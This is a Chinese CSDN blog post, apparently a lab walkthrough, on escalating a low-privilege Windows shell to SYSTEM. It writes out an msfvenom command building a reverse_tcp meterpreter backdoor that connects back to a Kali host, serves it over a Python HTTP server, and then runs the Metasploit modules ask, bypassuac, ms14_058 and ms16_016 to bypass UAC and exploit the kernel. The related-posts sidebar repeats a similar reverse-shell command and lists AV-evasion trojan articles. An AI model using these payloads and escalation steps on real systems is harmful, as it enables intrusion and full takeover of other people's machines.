低权限绕过UAC

最新推荐文章于 2024-03-12 01:31:34 发布
最新推荐文章于 2024-03-12 01:31:34 发布
阅读量674 收藏 2
点赞数 1
分类专栏: 笔记 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/111409422
版权

先用msfvenom做一个码,上传到目标机,获得一个低权限的shell,然后getsystem,失败

目录

在这里插入图片描述

目标机的管理员用户,那么接下来我就用这个y1用户登录
在这里插入图片描述
目标机的ip
在这里插入图片描述

在这里插入图片描述
kali的ip
在这里插入图片描述
制作一个名为mantouka的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.34 LPORT=6666 -f exe > mantouka.exe

在这里插入图片描述
用python开启一个简易的http服务

python3 -m http.server 7777

在这里插入图片描述
目标机访问
在这里插入图片描述
kali设置监听
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

kali监听好后,目标机去执行这个后门触发shell

在这里插入图片描述

在这里插入图片描述
尝试getsystem失败
在这里插入图片描述
查看当前低权限session
在这里插入图片描述

UAC提示绕过

使用exploit/windows/local/ask,去绕过UAC
在这里插入图片描述

在这里插入图片描述
设置session和显示的名字,然后开始监听
在这里插入图片描述
目标机点是
在这里插入图片描述

成功得到system
在这里插入图片描述

UAC不提示绕过

使用exploit/windows/local/bypassuac(yes部分设置好)
在这里插入图片描述
这的sessino我还是选的低权限session
在这里插入图片描述
然后直接执行exploit,就会获得一个新的session
然后直接成功提权,没有报错,也没有提示UAC
在这里插入图片描述

漏洞提权

在这里插入图片描述

use exploit/windows/local/ms14_058_track_popup_men

yes的地方设置下,session还是选低权限那个2
在这里插入图片描述

成功利用漏洞提权
在这里插入图片描述
然后直接用getsystem就好了

也可以试试其他的本地exploit

搜索ms16_016
在这里插入图片描述
把yes的地方设置依稀,这里的session我依旧是选的低权限
在这里插入图片描述
执行exploit,成功得到新的session
在这里插入图片描述
而且直接就是system权限
在这里插入图片描述

喜欢的话,记得点赞哦,这个美少女就送你了(滑稽)

在这里插入图片描述

樱浅沐冰
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python 跳过_python如何轻松绕过UAC
weixin_39784972的博客
11-24 409
很多时候我们不希望我们的软件弹出UAC提示,这个时候我们可以通过注册表的方法去解决。这其实已经不在是一个安全的编程了,它变成了一把双刃剑。当然我们只是讨论这种问题该怎么解决。具体用在什么方面那是你的问题咯!通过下面的代码我们可以轻松绕过UAC:# -*- coding: utf-8 -*-“”“Created on Mon Jan 8 09:09:51 2018@author: coordinat...
1433提权/绕过uac提权-零基础渗透自学路线
最新发布
程序员六七的博客
05-21 850
前言本文将介绍如何绕过KASLR以及如何提权利用。KASLR绕过可以利用操作加上组订阅可以泄露rule中的字段。该方法应该是可以用来泄露基地址的
绕过UAC提示以管理员身份运行程序
weixin_30896763的博客
05-14 989
windows 7下,我们可能经常需要以管理员权限运行某个程序,但每次运行一个程序都得:先找到那个程序,右键鼠标,在弹出菜单中选择以管理员身份运行,而且还会弹出以下窗口,让你点击确认才行。 有些人可能会选择禁用UAC,但这毕竟对系统的安全存在影响。下面就用一个简单的方法解决这个问题。 这个简单的方法就是利用系统自带的任务计划程序。 第一步:创建一个任务来运行你想要运行的程序...
设置电脑中的某个程序不弹出UAC用户控制提示的方法
weixin_30487317的博客
04-27 2634
有用户发现在电脑开机后总是会弹出UAC用户账户控制窗口,这是因为电脑中的某个程序设置了开机启动,这样就会在开机后启动该程序时出现UAC提示。如果想要省略该提示,可以在电脑中设置该程序不弹出UAC用户控制提示,具体请看以下设置方法。 1、按Win+R打开运行,输入regedit,并回车打开注册表编辑器; 2、找到 HKEY_CURRENT_USERS\Software\Microsof...
绕过UAC 不弹窗启动程序的方法
slfkj的博客
12-23 1503
https://baijiahao.baidu.com/s?id=1678518589760092233&wfr=spider&for=pc
64位下绕过UAC源代码
04-28
在64位Windows 7系统中,UAC的策略更加严格,对于开发人员来说,有时可能需要绕过UAC以进行特定的调试或测试工作。"64位下绕过UAC源代码"正是针对这种情况的一个解决方案。 首先,了解UAC的工作原理至关重要。当一...
易语言UAC权限
08-10
很多时候,易语言无法在TP运行下运行调试.易语言会提示UAC权限不足,这个源码来帮助小伙伴们解决这个类似情况的问题
UAC绕过工具Sigcheck、Strings
11-17
然而,在某些情况下,恶意行为者可能会利用Sigcheck的特性来绕过UAC。例如,他们可能会创建伪造的数字签名,使恶意文件看起来像是来自受信任的源,从而规避UAC的警告。 **Strings** 是另一个实用程序,它能够从二...
欺骗方式绕过vista windows7 UAC
05-27
标签“BypassUAC”表明这是一个关于如何绕过UAC的技术,可能是通过利用某些漏洞或者技巧,使得程序能够以非管理员权限执行时,依然可以执行需要管理员权限的操作。 在提供的压缩包文件“ByPassUAC”中,可能包含了...
UAC直接提权工具
03-10
描述中提到该工具“支持win10”并且“发出来的时候仍有效”,这意味着该工具能够在最新的Windows 10操作系统环境下实现提权,并且在发布时能够绕过UAC的防护机制。 标签“UAC 提权”进一步明确了讨论的主题,即通过...
绕过UAC提权
谢公子的博客
02-14 7809
UAC UAC(User Account Control,用户账号控制)是微软为了提高系统安全性在Windows Vista中引入的技术。UAC要求用户在执行可能影响计算机运行的操作或在进行可能影响其他用户的设置之前,拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证,以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行更改。在Windows Vi...
window绕开UAC——利用UAC白名单程序提权
甜筒八部 的专栏
11-18 7658
Se在实际开发过程中,可以通过Process Explorer检查服务或程序处于哪个Session,会不会遇到Session 0 隔离问题。我们在Services 中找到之前加载的AlertService 服务,右键属性查看其Session 状态。
meterpreter之getsystem命令提权详解
redwand的博客
07-23 7749
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是提权用的,没有更详细的说明,很多人会误解为这是meterpreter的一键提权工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及提权过程。
win下python修改IP和提UAC权限
火苗999℃的博客
05-21 762
win下python修改IP和提UAC权限代码 代码 import os import sys import time import pymysql import queue import json import wmi import win32api import re import ctypes def loadtext(path): try: f = open(path,"r") txt = f.read() f.close()
<RunLevel>HighestAvailable</RunLevel> python 添加计划任务最高权限运行,避免弹出UAC对话框
zengliguang的专栏
03-12 273
账户运行的任务拥有系统级别的权限,这是Windows中最高的权限级别之一。这意味着该任务可以执行需要管理员权限的操作。:由于是使用系统账户运行,因此在运行任务时不会弹出UAC提示要求用户确认或输入密码。表示任务将在服务环境中以系统账户身份启动,而不是作为登录用户的一部分启动。身份运行,并且由于其高权限性质,在执行时不需用户交互,类似于设置了。这段代码创建了一个计划任务,该任务将以。设置账户为管理员账户(如。
实战: unicorn生成免杀木马,绕过win10防火墙和windows defender
zhaoyuhan1124的博客
09-03 8679
实战: unicorn生成免杀木马,绕过win10防火墙和windows defender简介原理步骤攻击总结 简介 随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高,目前市面上主流工具有WinPaylods, Veil v3和TheFatRat,这里介绍一个开源工具unicorn。原文地址: https://null-byte.wonderhowto.com/how-to...
windows提权的几种姿势
weixin_44300286的博客
09-07 4262
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
UAC 实现原理及绕过方法
weixin_30510153的博客
03-20 1182
目录 0x00 UAC 工作流程 0x01 UAC 实现方法(用户登陆过程) 0x02 UAC 架构 0x03 触发UAC 0x04 UAC 虚拟化 0x05 UAC 逆向分析 1x00 UAC Bypass 1x0...
c++ 让指定进程以管理员权限运行,并且绕过UAC提示
05-26
Windows 中,要以管理员权限运行一个进程并绕过 UAC 提示,可以使用以下方法: 1. 使用 ShellExecuteEx 函数启动进程。该函数可以在指定的进程上下文中启动应用程序。 2. 在启动进程之前,需要创建一个管理员...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值